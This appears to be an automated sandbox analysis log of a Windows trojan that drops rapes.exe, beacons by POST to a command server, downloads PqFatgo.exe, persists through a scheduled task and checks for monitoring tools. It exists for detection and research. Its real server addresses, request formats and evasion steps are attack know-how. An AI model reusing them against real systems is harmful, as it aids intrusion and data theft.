Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 41 32 42 37 31 42 32 35 46 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7ABA2B71B25F82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic HTTP traffic detected: GET /files/2043702969/PqFatgo.exe HTTP/1.1Host: 176.113.115.7
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View IP Address: 176.113.115.7 176.113.115.7
Source: Joe Sandbox View IP Address: 176.113.115.6 176.113.115.6
Source: Joe Sandbox View IP Address: 176.113.115.6 176.113.115.6
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49718 -> 176.113.115.7:80
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: global traffic HTTP traffic detected: GET /files/2043702969/PqFatgo.exe HTTP/1.1Host: 176.113.115.7
Source: unknown HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

System Summary
barindex
PE file contains section with special chars
Source: FRCe39S0oE.exe Static PE information: section name:
Source: FRCe39S0oE.exe Static PE information: section name: .idata
Source: FRCe39S0oE.exe Static PE information: section name:
Source: rapes.exe.0.dr Static PE information: section name:
Source: rapes.exe.0.dr Static PE information: section name: .idata
Source: rapes.exe.0.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File created: C:\Windows\Tasks\rapes.job Jump to behavior
PE file overlay found
Source: PqFatgo[1].exe.11.dr Static PE information: Data appended to the last section found
Source: PqFatgo.exe.11.dr Static PE information: Data appended to the last section found
Uses 32bit PE files
Source: FRCe39S0oE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FRCe39S0oE.exe Static PE information: Section: ZLIB complexity 0.9988862345041323
Source: FRCe39S0oE.exe Static PE information: Section: gplwiqel ZLIB complexity 0.9944501366120219
Source: rapes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9988862345041323
Source: rapes.exe.0.dr Static PE information: Section: gplwiqel ZLIB complexity 0.9944501366120219
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@0/2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\PqFatgo[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File created: C:\Users\user\AppData\Local\Temp\bb556cff4a Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: FRCe39S0oE.exe Virustotal: Detection: 56%
Source: FRCe39S0oE.exe ReversingLabs: Detection: 72%
Source: FRCe39S0oE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: FRCe39S0oE.exe String found in binary or memory: " /add
Source: FRCe39S0oE.exe String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: " /add
Source: rapes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: " /add
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File read: C:\Users\user\Desktop\FRCe39S0oE.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FRCe39S0oE.exe "C:\Users\user\Desktop\FRCe39S0oE.exe"
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: FRCe39S0oE.exe Static file information: File size 1888768 > 1048576
Source: FRCe39S0oE.exe Static PE information: Raw size of gplwiqel is bigger than: 0x100000 < 0x19bc00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Unpacked PE file: 0.2.FRCe39S0oE.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gplwiqel:EW;pmtwfvwg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gplwiqel:EW;pmtwfvwg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 1.2.rapes.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gplwiqel:EW;pmtwfvwg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gplwiqel:EW;pmtwfvwg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 2.2.rapes.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gplwiqel:EW;pmtwfvwg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gplwiqel:EW;pmtwfvwg:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: PqFatgo[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x344cfe
Source: FRCe39S0oE.exe Static PE information: real checksum: 0x1dbaeb should be: 0x1d8769
Source: rapes.exe.0.dr Static PE information: real checksum: 0x1dbaeb should be: 0x1d8769
Source: PqFatgo.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x344cfe
PE file contains sections with non-standard names
Source: FRCe39S0oE.exe Static PE information: section name:
Source: FRCe39S0oE.exe Static PE information: section name: .idata
Source: FRCe39S0oE.exe Static PE information: section name:
Source: FRCe39S0oE.exe Static PE information: section name: gplwiqel
Source: FRCe39S0oE.exe Static PE information: section name: pmtwfvwg
Source: FRCe39S0oE.exe Static PE information: section name: .taggant
Source: rapes.exe.0.dr Static PE information: section name:
Source: rapes.exe.0.dr Static PE information: section name: .idata
Source: rapes.exe.0.dr Static PE information: section name:
Source: rapes.exe.0.dr Static PE information: section name: gplwiqel
Source: rapes.exe.0.dr Static PE information: section name: pmtwfvwg
Source: rapes.exe.0.dr Static PE information: section name: .taggant
Source: PqFatgo[1].exe.11.dr Static PE information: section name: .gxfg
Source: PqFatgo[1].exe.11.dr Static PE information: section name: .retplne
Source: PqFatgo[1].exe.11.dr Static PE information: section name: _RDATA
Source: PqFatgo[1].exe.11.dr Static PE information: section name: .cSs
Source: PqFatgo.exe.11.dr Static PE information: section name: .gxfg
Source: PqFatgo.exe.11.dr Static PE information: section name: .retplne
Source: PqFatgo.exe.11.dr Static PE information: section name: _RDATA
Source: PqFatgo.exe.11.dr Static PE information: section name: .cSs
Source: FRCe39S0oE.exe Static PE information: section name: entropy: 7.980997991128503
Source: FRCe39S0oE.exe Static PE information: section name: gplwiqel entropy: 7.953239518217832
Source: rapes.exe.0.dr Static PE information: section name: entropy: 7.980997991128503
Source: rapes.exe.0.dr Static PE information: section name: gplwiqel entropy: 7.953239518217832
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\PqFatgo[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10341500101\PqFatgo.exe Jump to dropped file
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
